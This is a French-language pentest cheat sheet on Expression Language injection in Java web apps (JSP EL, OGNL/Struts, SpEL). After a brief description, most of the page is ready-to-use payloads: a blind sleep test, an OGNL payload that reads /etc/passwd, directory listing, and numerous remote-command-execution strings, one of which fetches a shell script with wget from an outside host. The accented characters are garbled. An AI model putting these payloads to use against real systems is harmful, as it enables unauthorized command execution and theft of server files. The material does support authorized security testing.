๐ Pentest Web๐ Injections๐ ELiExpression Language injection
Description
Les Expressions Languages (EL) permettent de manipuler les donnรฉes au sein d'une page JSP (ou d'un fichier *.tag) plus simplement qu'avec les scriptlets Java.
Une EL permet d'accรฉder simplement aux beans des diffรฉrents scopes de l'application web (page, request, session et application). Utilisรฉ conjointement avec des librairies de tags, elles permettent de se passer totalement des scriptlets.
Une expression EL est de la forme suivante :
La chaรฎne expression correspond ร l'expression ร interprรฉter. Une expression peut รชtre composรฉe de plusieurs termes sรฉparรฉs par des opรฉrateurs.
Reconnaissance
Remplacement de caractรจres
Copier test${โstrโ.toString().replace(โsโ, โxโ)}ing #doit renvoyer "textring"
En aveugle
Copier #Sleep 10 secondes
https://target.com/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23kzxs%3d%40java.lang.Thread%40sleep(10000)%2c1%3f%23xx%3a%23request.toString}
RFI
Copier https://target.com/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23wwww=new%20java.io.File(%23parameters.REPLACE[0]),%23pppp=new%20java.io.FileInputStream(%23wwww),%23qqqq=new%20java.lang.Long(%23wwww.length()),%23tttt=new%20byte[%23qqqq.intValue()],%23llll=%23pppp.read(%23tttt),%23pppp.close(),%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(new+java.lang.String(%23tttt))%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString}&REPLACE=%2fetc%2fpasswd
Directory listing
Copier https://target.com/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23wwww=new%20java.io.File(%23parameters.REPLACE[0]),%23pppp=%23wwww.listFiles(),%23qqqq=@java.util.Arrays@toString(%23pppp),%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(%23qqqq)%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString}&REPLACE=..
RCE
SpEL eval tag
Copier T( java . lang . Runtime ) . getRuntime () . exec (โ[ COMMAND HERE]โ)
SpEL message tag
Copier ${ java . lang . Runtime . getCurrentRuntime () . exec ( "[COMMAND HERE" )}
Autres charges utiles
Copier '' . class . forName ( 'java.lang.Runtime' ) . getMethod ( 'getRuntime' , null ) . invoke ( null , null ) . exec ( <COMMAND STRING / ARRAY > )
'' . class . forName ( 'java.lang.ProcessBuilder' ) . getDeclaredConstructors ()[ 1 ] . newInstance ( <COMMAND ARRAY / LIST > ) . start ()
// Runtime via getDeclaredConstructors
#{ session . setAttribute ( "rtc" , "" . getClass () . forName ( "java.lang.Runtime" ) . getDeclaredConstructors ()[ 0 ])}
#{ session . getAttribute ( "rtc" ) . setAccessible ( true )}
#{ session . getAttribute ( "rtc" ) . getRuntime () . exec ( "/bin/bash -c whoami" )}
// Execution de commandes via processbuilder
${ request . setAttribute ( "c" , "" . getClass () . forName ( "java.util.ArrayList" ) . newInstance ())}
${ request . getAttribute ( "c" ) . add ( "cmd.exe" )}
${ request . getAttribute ( "c" ) . add ( "/k" )}
${ request . getAttribute ( "c" ) . add ( "ping x.x.x.x" )}
${ request . setAttribute ( "a" , "" . getClass () . forName ( "java.lang.ProcessBuilder" ) . getDeclaredConstructors ()[ 0 ] . newInstance ( request . getAttribute ( "c" )) . start ())}
// Execution de commandes via Reflection & Invoke
${ "" . getClass () . forName ( "java.lang.Runtime" ) . getMethods ()[ 6 ] . invoke ( "" . getClass () . forName ( "java.lang.Runtime" )) . exec ( "calc.exe" )}
// Executions de commmande via ScriptEngineManager
${ request . getClass () . forName ( "javax.script.ScriptEngineManager" ) . newInstance () . getEngineByName ( "js" ) . eval ( "java.lang.Runtime.getRuntime().exec(\\\"ping x.x.x.x\\\")" ))}
{{ 'a' . getClass () . forName ( 'javax.script.ScriptEngineManager' ) . newInstance () . getEngineByName ( 'JavaScript' ) . eval (\ "var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}
${facesContext.getExternalContext().setResponseHeader(" output ","".getClass().forName(" javax . script . ScriptEngineManager ").newInstance().getEngineByName(" JavaScript ").eval(\"var x=new java.lang.ProcessBuilder;x.command(\\\"wget\\\",\\\"http://x.x.x.x/1.sh\\\");
// https://github.com/marcin33/hacking/blob/master/payloads/spel-injections.txt
(T(org.springframework.util.StreamUtils).copy(T(java.lang.Runtime).getRuntime().exec("cmd "+T(java.lang.String).valueOf(T(java.lang.Character).toChars(0x2F))+"c "+T(java.lang.String).valueOf(new char[]{T(java.lang.Character).toChars(100)[0],T(java.lang.Character).toChars(105)[0],T(java.lang.Character).toChars(114)[0]})).getInputStream(),T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes().getResponse().getOutputStream()))
T(java.lang.System).getenv()[0]
T(java.lang.Runtime).getRuntime().exec('ping my-domain.com')
T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(" cmd / c dir ").getInputStream())
''.class.forName('java.lang.Runtime').getRuntime().exec('calc.exe')
Derniรจre mise ร jour il y a 1 an